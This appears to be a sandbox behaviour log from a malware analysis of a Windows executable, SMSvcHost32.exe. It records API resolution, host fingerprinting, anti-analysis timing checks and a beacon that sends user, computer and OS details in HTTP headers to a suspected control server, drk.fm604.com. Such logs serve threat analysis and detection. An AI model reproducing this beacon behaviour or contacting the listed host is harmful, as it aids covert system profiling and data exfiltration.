| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x765c6880 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpA, address_out = 0x765bcc30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x765b8c80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x765b38c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableW, address_out = 0x765be9e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x765baac0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x765c6820 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsA, address_out = 0x765c5dd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x765c6ca0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x765b7990 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FormatMessageW, address_out = 0x765c4f80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x765bf640 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x779c7a80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x765c69b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x765b3870 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x765ba720 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x765ba7e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OutputDebugStringA, address_out = 0x765bfde0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x765c6630 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x765b23e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x765b79a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x765b9b90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x765bac70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationA, address_out = 0x765c6b40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x765baa80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableA, address_out = 0x765ba8a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x765ba940 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEvent, address_out = 0x765c67d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x765b9bc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsBadReadPtr, address_out = 0x765b2510 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineA, address_out = 0x765bab60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x765c0160 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsBadCodePtr, address_out = 0x765bd0e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x765b2af0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DisableThreadLibraryCalls, address_out = 0x765ba860 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetProcessWorkingSetSize, address_out = 0x765c0120 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x765b1b90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x765c4c30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x765ba100 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x7798efe0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FileTimeToDosDateTime, address_out = 0x765c2930 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x765c6c40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x765b9f50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x765ba840 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x765c6bb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTempFileNameA, address_out = 0x765c6b00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FileTimeToLocalFileTime, address_out = 0x765c68d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandle, address_out = 0x765c6a60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathA, address_out = 0x765c6b20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileA, address_out = 0x765c68b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SystemTimeToFileTime, address_out = 0x765c4c10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x765c5eb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x765b7a30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVersion, address_out = 0x765baaf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTime, address_out = 0x765c4940 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x765b8bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x765c6800 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x765c6a70 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\shell32.dll, base_address = 0x75120000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ole32.dll, base_address = 0x771d0000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\shlwapi.dll, base_address = 0x74b20000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\wininet.dll, base_address = 0x702b0000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\crypt32.dll, base_address = 0x77050000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\netapi32.dll, base_address = 0x77490000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\iphlpapi.dll, base_address = 0x71d30000 |
|
1 | |
| Module | Get Handle | module_name = WINMM.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = WINMM.dll, base_address = 0x6fdc0000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\userenv.dll, base_address = 0x701e0000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\oleaut32.dll, base_address = 0x76b60000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = 200, address_out = 0x76b99590 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-12-13 14:01:47 (UTC) |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x765ba980 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x765c4ff0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x765b7570 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x765b9e30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x765c6740 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x765c66a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x765c6700 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x765bb040 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x765bace0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x779a7dc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x779b4010 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x779b2a50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x765ba7b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x779b2290 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x779b2910 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x779d7a60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x779cac00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x779ba890 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x765bac80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x765e0830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x775f6270 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x765bfe80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x765bff80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x765e0e00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x765ba750 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x765e1240 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x765bad60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x765e1460 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x765b9a10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x7757ded0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x765b3630 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| Module | Get Filename | module_name = WINMM.dll, process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, size = 260 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlPcToFileHeader, address_out = 0x779b5100 |
|
1 | |
| Debug | process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, type = DEBUG_STRING, text = 3512:C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe --vwxyz Ignition.... |
|
1 | ||
| System | Get Info | type = Hardware Information |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlNtStatusToDosError, address_out = 0x779b83c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtDeviceIoControlFile, address_out = 0x779d6cf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtQueryInformationFile, address_out = 0x779d6d90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtSetInformationFile, address_out = 0x779d6f10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtQueryVolumeInformationFile, address_out = 0x779d7130 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtQueryDirectoryFile, address_out = 0x779d6ff0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtQuerySystemInformation, address_out = 0x779d7000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetQueuedCompletionStatusEx, address_out = 0x765e10f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileCompletionNotificationModes, address_out = 0x765b9dd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x765e0830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CancelIoEx, address_out = 0x765bf450 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeConditionVariable, address_out = 0x77986710 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SleepConditionVariableCS, address_out = 0x775f7f60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SleepConditionVariableSRW, address_out = 0x775f7fb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WakeAllConditionVariable, address_out = 0x779c8d70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WakeConditionVariable, address_out = 0x779cc720 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CancelSynchronousIo, address_out = 0x765e05a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFinalPathNameByHandleW, address_out = 0x765c6ac0 |
|
1 | |
| Module | Load | module_name = powrprof.dll, base_address = 0x74770000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\powrprof.dll, function = PowerRegisterSuspendResumeNotification, address_out = 0x74775ea0 |
|
1 | |
| Module | Load | module_name = user32.dll, base_address = 0x77810000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = SetWinEventHook, address_out = 0x7782fc00 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_STREAM |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| System | Get Info | type = Hardware Information |
|
2 | |
| Module | Load | module_name = ADVAPI32.DLL, base_address = 0x74aa0000 |
|
1 | |
| Module | Load | module_name = KERNEL32.DLL, base_address = 0x765a0000 |
|
1 | |
| Module | Load | module_name = NETAPI32.DLL, base_address = 0x77490000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\netapi32.dll, function = NetStatisticsGet, address_out = 0x77492a40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\netapi32.dll, function = NetApiBufferFree, address_out = 0x6ff916d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x74ac0590 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74ac10a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x74ac0650 |
|
1 | |
| Module | Get Handle | module_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, base_address = 0x400000 |
|
1 | |
| Module | Get Address | module_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, function = _OPENSSL_isservice, address_out = 0x0 |
|
1 | |
| Module | Load | module_name = USER32.DLL, base_address = 0x77810000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetForegroundWindow, address_out = 0x77848cb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetCursorInfo, address_out = 0x7784c160 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetQueueStatus, address_out = 0x7782e1b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x765c7b50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseToolhelp32Snapshot, address_out = 0x0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Heap32First, address_out = 0x765e3f00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Heap32Next, address_out = 0x765e4270 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Heap32ListFirst, address_out = 0x765e4120 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Heap32ListNext, address_out = 0x765e41d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32First, address_out = 0x765bf4d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32Next, address_out = 0x765bd1c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Thread32First, address_out = 0x765c5c50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Thread32Next, address_out = 0x765c5150 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Module32First, address_out = 0x765e44b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Module32Next, address_out = 0x765e4660 |
|
1 | |
| System | Get Time | type = Ticks, time = 166734 |
|
1 | |
| System | Get Time | type = Ticks, time = 166765 |
|
1 | |
| System | Get Time | type = Ticks, time = 166781 |
|
1 | |
| System | Get Time | type = Ticks, time = 166828 |
|
1 | |
| System | Get Time | type = Ticks, time = 166843 |
|
1 | |
| System | Get Time | type = Ticks, time = 166875 |
|
1 | |
| System | Get Time | type = Ticks, time = 166890 |
|
1 | |
| System | Get Time | type = Ticks, time = 166921 |
|
1 | |
| System | Get Time | type = Ticks, time = 166953 |
|
1 | |
| System | Get Time | type = Ticks, time = 167000 |
|
1 | |
| System | Get Time | type = Ticks, time = 167015 |
|
1 | |
| System | Get Time | type = Ticks, time = 167281 |
|
1 | |
| System | Get Time | type = Ticks, time = 167296 |
|
1 | |
| System | Get Time | type = Ticks, time = 167359 |
|
1 | |
| System | Get Time | type = Ticks, time = 167375 |
|
1 | |
| System | Get Time | type = Ticks, time = 167468 |
|
1 | |
| System | Get Time | type = Ticks, time = 167484 |
|
1 | |
| System | Get Time | type = Ticks, time = 167609 |
|
1 | |
| System | Get Time | type = Ticks, time = 167625 |
|
1 | |
| System | Get Time | type = Ticks, time = 167921 |
|
8 | |
| System | Get Time | type = Ticks, time = 167937 |
|
19 | |
| System | Get Time | type = Ticks, time = 167953 |
|
10 | |
| System | Get Time | type = Ticks, time = 168093 |
|
6 | |
| System | Get Time | type = Ticks, time = 168109 |
|
19 | |
| System | Get Time | type = Ticks, time = 168125 |
|
16 | |
| System | Get Time | type = Ticks, time = 168187 |
|
1 | |
| System | Get Time | type = Ticks, time = 168187 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| System | Get Time | type = System Time, time = 2018-12-13 14:01:49 (UTC) |
|
2 | |
| Module | Get Filename | module_name = WINMM.dll, process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, size = 520 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-12-13 14:01:50 (UTC) |
|
12 | |
| Environment | Get Environment String | name = NODE_CHANNEL_FD |
|
1 | |
| Environment | Get Environment String | name = USERNAME, result_out = Nd9E1FYi |
|
1 | |
| Environment | Get Environment String | name = startupObject |
|
1 | |
| Environment | Get Environment String | name = NODE_HEAPDUMP_OPTIONS |
|
1 | |
| System | Get Time | type = System Time, time = 2018-12-13 14:01:50 (UTC) |
|
6 | |
| Environment | Get Environment String | name = NODE_DEBUG |
|
1 | |
| Module | Load | module_name = iphlpapi.dll, base_address = 0x71d30000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\iphlpapi.dll, function = GetNetworkParams, address_out = 0x71d3c4f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\iphlpapi.dll, function = GetAdaptersAddresses, address_out = 0x71d35b70 |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x74aa0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SystemFunction036, address_out = 0x74682a60 |
|
1 | |
| DNS | Get Hostname | - |
|
1 |
Thread 0x4d4
110
71
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Debug | process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, type = DEBUG_STRING, text = WMA 0 |
|
1 | ||
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_0, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyEnable |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyEnable, data = 0 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0, access_type = INTERNET_OPEN_TYPE_DIRECT |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = drk.fm604.com, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /rbody320, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-File-Name: C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-User-Name: X2VS1CUM\Nd9E1FYi |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyServer |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyOverride |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = AutoConfigURL |
|
1 | |
| System | Get Computer Name | result_out = X2VS1CUM |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-ComputerName: X2VS1CUM |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-OSVersion: 6.2.9200| 0.0|1|0x00000100 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-VendorId: 2816 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\* |
|
1 | |
| Environment | Get Environment String | name = crackmeololo |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-IsTrustedComp: 0 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-HTTP-Agent: WININET |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-Present: FALSE |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-Used: FALSE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = AutoDetect |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-AutoDetect: FALSE |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = drk.fm604.com/rbody320 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 512, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 512, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77a2d9b0 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_0, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyEnable |
|
